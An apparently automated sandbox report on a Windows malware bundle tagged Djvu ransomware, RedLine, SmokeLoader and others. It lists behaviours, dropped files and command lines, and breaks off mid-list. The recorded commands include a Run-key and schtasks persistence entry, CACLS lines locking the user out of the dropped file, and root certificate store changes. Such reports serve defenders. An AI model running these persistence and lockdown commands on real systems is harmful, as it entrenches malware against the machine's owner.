Malware Analysis Report

2025-01-18 09:20

Sample ID 230807-nyrq5afa99
Target 76aa2d02f34135fd7cb03ad8426fc44cbfbe3ab94493a984df702fbf4975fccc
SHA256 76aa2d02f34135fd7cb03ad8426fc44cbfbe3ab94493a984df702fbf4975fccc
Tags
amadey djvu fabookie glupteba redline smokeloader logsdiller cloud (tg: @logsdillabot) lux3 up3 backdoor discovery dropper evasion infostealer loader persistence ransomware spyware stealer trojan pub5
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

76aa2d02f34135fd7cb03ad8426fc44cbfbe3ab94493a984df702fbf4975fccc

Threat Level: Known bad

The file 76aa2d02f34135fd7cb03ad8426fc44cbfbe3ab94493a984df702fbf4975fccc was found to be: Known bad.

Malicious Activity Summary

amadey djvu fabookie glupteba redline smokeloader logsdiller cloud (tg: @logsdillabot) lux3 up3 backdoor discovery dropper evasion infostealer loader persistence ransomware spyware stealer trojan pub5

Glupteba

RedLine

Suspicious use of NtCreateUserProcessOtherParentProcess

SmokeLoader

Detect Fabookie payload

Fabookie

Amadey

Detected Djvu ransomware

Glupteba payload

Djvu Ransomware

Drops file in Drivers directory

Stops running service(s)

Downloads MZ/PE file

Modifies Windows Firewall

Reads user/profile data of web browsers

Deletes itself

Modifies file permissions

Loads dropped DLL

Executes dropped EXE

Looks up external IP address via web service

Adds Run key to start application

Accesses 2FA software files, possible credential harvesting

Legitimate hosting services abused for malware hosting/C2

Accesses cryptocurrency files/wallets, possible credential harvesting

Drops file in System32 directory

Suspicious use of SetThreadContext

Drops file in Program Files directory

Launches sc.exe

Unsigned PE

Program crash

Enumerates physical storage devices

Suspicious behavior: LoadsDriver

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Modifies system certificate store

Modifies data under HKEY_USERS

Suspicious behavior: GetForegroundWindowSpam

Creates scheduled task(s)

Suspicious behavior: MapViewOfSection

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-08-07 11:48

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-08-07 11:48

Reported

2023-08-07 11:58

Platform

win7-20230712-en

Max time kernel

106s

Max time network

602s

Command Line

"C:\Users\Admin\AppData\Local\Temp\76aa2d02f34135fd7cb03ad8426fc44cbfbe3ab94493a984df702fbf4975fccc.exe"

Signatures

Amadey

trojan amadey

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Detected Djvu ransomware

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Djvu Ransomware

ransomware djvu

Fabookie

spyware stealer fabookie

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

RedLine

infostealer redline

SmokeLoader

trojan backdoor smokeloader

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

Deletes itself

Description Indicator Process Target
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\E80E.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\BF.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B7A.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\E80E.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2477.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3098.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\36B1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\416C.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aafg31.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4D7D.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\latestplayer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\91D0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000001001\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000001001\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\62D3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AE08.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000002001\2cba948feb9c53fce4409f0079aec61c.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\igdbbwr N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000003001\latestX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\D99B.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe N/A
N/A N/A C:\Windows\System32\powercfg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FC58.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-4159544280-4273523227-683900707-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\373c239a-1b4b-4cd5-96cf-9ad79c86026b\\E80E.exe\" --AutoStart" C:\Users\Admin\AppData\Local\Temp\E80E.exe N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\cacls.exe

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\E80E.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\62D3.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\62D3.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\E80E.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\E80E.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\76aa2d02f34135fd7cb03ad8426fc44cbfbe3ab94493a984df702fbf4975fccc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\76aa2d02f34135fd7cb03ad8426fc44cbfbe3ab94493a984df702fbf4975fccc.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\36B1.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1204 wrote to memory of 3044 N/A N/A C:\Users\Admin\AppData\Local\Temp\E80E.exe
PID 1204 wrote to memory of 3044 N/A N/A C:\Users\Admin\AppData\Local\Temp\E80E.exe
PID 1204 wrote to memory of 3044 N/A N/A C:\Users\Admin\AppData\Local\Temp\E80E.exe
PID 1204 wrote to memory of 3044 N/A N/A C:\Users\Admin\AppData\Local\Temp\E80E.exe
PID 1204 wrote to memory of 2840 N/A N/A C:\Windows\system32\regsvr32.exe
PID 1204 wrote to memory of 2840 N/A N/A C:\Windows\system32\regsvr32.exe
PID 1204 wrote to memory of 2840 N/A N/A C:\Windows\system32\regsvr32.exe
PID 1204 wrote to memory of 2840 N/A N/A C:\Windows\system32\regsvr32.exe
PID 1204 wrote to memory of 2840 N/A N/A C:\Windows\system32\regsvr32.exe
PID 2840 wrote to memory of 3000 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2840 wrote to memory of 3000 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2840 wrote to memory of 3000 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2840 wrote to memory of 3000 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2840 wrote to memory of 3000 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2840 wrote to memory of 3000 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2840 wrote to memory of 3000 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1204 wrote to memory of 2980 N/A N/A C:\Windows\system32\regsvr32.exe
PID 1204 wrote to memory of 2980 N/A N/A C:\Windows\system32\regsvr32.exe
PID 1204 wrote to memory of 2980 N/A N/A C:\Windows\system32\regsvr32.exe
PID 1204 wrote to memory of 2980 N/A N/A C:\Windows\system32\regsvr32.exe
PID 1204 wrote to memory of 2980 N/A N/A C:\Windows\system32\regsvr32.exe
PID 2980 wrote to memory of 2868 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2980 wrote to memory of 2868 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2980 wrote to memory of 2868 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2980 wrote to memory of 2868 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2980 wrote to memory of 2868 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2980 wrote to memory of 2868 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2980 wrote to memory of 2868 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1204 wrote to memory of 2436 N/A N/A C:\Users\Admin\AppData\Local\Temp\BF.exe
PID 1204 wrote to memory of 2436 N/A N/A C:\Users\Admin\AppData\Local\Temp\BF.exe
PID 1204 wrote to memory of 2436 N/A N/A C:\Users\Admin\AppData\Local\Temp\BF.exe
PID 1204 wrote to memory of 2436 N/A N/A C:\Users\Admin\AppData\Local\Temp\BF.exe
PID 1204 wrote to memory of 1732 N/A N/A C:\Users\Admin\AppData\Local\Temp\B7A.exe
PID 1204 wrote to memory of 1732 N/A N/A C:\Users\Admin\AppData\Local\Temp\B7A.exe
PID 1204 wrote to memory of 1732 N/A N/A C:\Users\Admin\AppData\Local\Temp\B7A.exe
PID 1204 wrote to memory of 1732 N/A N/A C:\Users\Admin\AppData\Local\Temp\B7A.exe
PID 3044 wrote to memory of 2444 N/A C:\Users\Admin\AppData\Local\Temp\E80E.exe C:\Users\Admin\AppData\Local\Temp\E80E.exe
PID 3044 wrote to memory of 2444 N/A C:\Users\Admin\AppData\Local\Temp\E80E.exe C:\Users\Admin\AppData\Local\Temp\E80E.exe
PID 3044 wrote to memory of 2444 N/A C:\Users\Admin\AppData\Local\Temp\E80E.exe C:\Users\Admin\AppData\Local\Temp\E80E.exe
PID 3044 wrote to memory of 2444 N/A C:\Users\Admin\AppData\Local\Temp\E80E.exe C:\Users\Admin\AppData\Local\Temp\E80E.exe
PID 3044 wrote to memory of 2444 N/A C:\Users\Admin\AppData\Local\Temp\E80E.exe C:\Users\Admin\AppData\Local\Temp\E80E.exe
PID 3044 wrote to memory of 2444 N/A C:\Users\Admin\AppData\Local\Temp\E80E.exe C:\Users\Admin\AppData\Local\Temp\E80E.exe
PID 3044 wrote to memory of 2444 N/A C:\Users\Admin\AppData\Local\Temp\E80E.exe C:\Users\Admin\AppData\Local\Temp\E80E.exe
PID 3044 wrote to memory of 2444 N/A C:\Users\Admin\AppData\Local\Temp\E80E.exe C:\Users\Admin\AppData\Local\Temp\E80E.exe
PID 3044 wrote to memory of 2444 N/A C:\Users\Admin\AppData\Local\Temp\E80E.exe C:\Users\Admin\AppData\Local\Temp\E80E.exe
PID 3044 wrote to memory of 2444 N/A C:\Users\Admin\AppData\Local\Temp\E80E.exe C:\Users\Admin\AppData\Local\Temp\E80E.exe
PID 3044 wrote to memory of 2444 N/A C:\Users\Admin\AppData\Local\Temp\E80E.exe C:\Users\Admin\AppData\Local\Temp\E80E.exe
PID 1204 wrote to memory of 1500 N/A N/A C:\Users\Admin\AppData\Local\Temp\2477.exe
PID 1204 wrote to memory of 1500 N/A N/A C:\Users\Admin\AppData\Local\Temp\2477.exe
PID 1204 wrote to memory of 1500 N/A N/A C:\Users\Admin\AppData\Local\Temp\2477.exe
PID 1204 wrote to memory of 1500 N/A N/A C:\Users\Admin\AppData\Local\Temp\2477.exe
PID 1204 wrote to memory of 2932 N/A N/A C:\Users\Admin\AppData\Local\Temp\3098.exe
PID 1204 wrote to memory of 2932 N/A N/A C:\Users\Admin\AppData\Local\Temp\3098.exe
PID 1204 wrote to memory of 2932 N/A N/A C:\Users\Admin\AppData\Local\Temp\3098.exe
PID 1204 wrote to memory of 2932 N/A N/A C:\Users\Admin\AppData\Local\Temp\3098.exe
PID 1204 wrote to memory of 2776 N/A N/A C:\Users\Admin\AppData\Local\Temp\36B1.exe
PID 1204 wrote to memory of 2776 N/A N/A C:\Users\Admin\AppData\Local\Temp\36B1.exe
PID 1204 wrote to memory of 2776 N/A N/A C:\Users\Admin\AppData\Local\Temp\36B1.exe
PID 1204 wrote to memory of 2776 N/A N/A C:\Users\Admin\AppData\Local\Temp\36B1.exe
PID 1204 wrote to memory of 2956 N/A N/A C:\Users\Admin\AppData\Local\Temp\416C.exe
PID 1204 wrote to memory of 2956 N/A N/A C:\Users\Admin\AppData\Local\Temp\416C.exe
PID 1204 wrote to memory of 2956 N/A N/A C:\Users\Admin\AppData\Local\Temp\416C.exe
PID 1204 wrote to memory of 2956 N/A N/A C:\Users\Admin\AppData\Local\Temp\416C.exe
PID 2932 wrote to memory of 1040 N/A C:\Users\Admin\AppData\Local\Temp\3098.exe C:\Users\Admin\AppData\Local\Temp\aafg31.exe

Processes

C:\Users\Admin\AppData\Local\Temp\76aa2d02f34135fd7cb03ad8426fc44cbfbe3ab94493a984df702fbf4975fccc.exe

"C:\Users\Admin\AppData\Local\Temp\76aa2d02f34135fd7cb03ad8426fc44cbfbe3ab94493a984df702fbf4975fccc.exe"

C:\Users\Admin\AppData\Local\Temp\E80E.exe

C:\Users\Admin\AppData\Local\Temp\E80E.exe

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\EC05.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\EC05.dll

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\F03A.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\F03A.dll

C:\Users\Admin\AppData\Local\Temp\BF.exe

C:\Users\Admin\AppData\Local\Temp\BF.exe

C:\Users\Admin\AppData\Local\Temp\B7A.exe

C:\Users\Admin\AppData\Local\Temp\B7A.exe

C:\Users\Admin\AppData\Local\Temp\E80E.exe

C:\Users\Admin\AppData\Local\Temp\E80E.exe

C:\Users\Admin\AppData\Local\Temp\2477.exe

C:\Users\Admin\AppData\Local\Temp\2477.exe

C:\Users\Admin\AppData\Local\Temp\3098.exe

C:\Users\Admin\AppData\Local\Temp\3098.exe

C:\Users\Admin\AppData\Local\Temp\36B1.exe

C:\Users\Admin\AppData\Local\Temp\36B1.exe

C:\Users\Admin\AppData\Local\Temp\416C.exe

C:\Users\Admin\AppData\Local\Temp\416C.exe

C:\Users\Admin\AppData\Local\Temp\aafg31.exe

"C:\Users\Admin\AppData\Local\Temp\aafg31.exe"

C:\Users\Admin\AppData\Local\Temp\4D7D.exe

C:\Users\Admin\AppData\Local\Temp\4D7D.exe

C:\Users\Admin\AppData\Local\Temp\latestplayer.exe

"C:\Users\Admin\AppData\Local\Temp\latestplayer.exe"

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

"C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN yiueea.exe /TR "C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "yiueea.exe" /P "Admin:N"&&CACLS "yiueea.exe" /P "Admin:R" /E&&echo Y|CACLS "..\577f58beff" /P "Admin:N"&&CACLS "..\577f58beff" /P "Admin:R" /E&&Exit

C:\Users\Admin\AppData\Local\Temp\62D3.exe

C:\Users\Admin\AppData\Local\Temp\62D3.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "yiueea.exe" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "yiueea.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cacls.exe

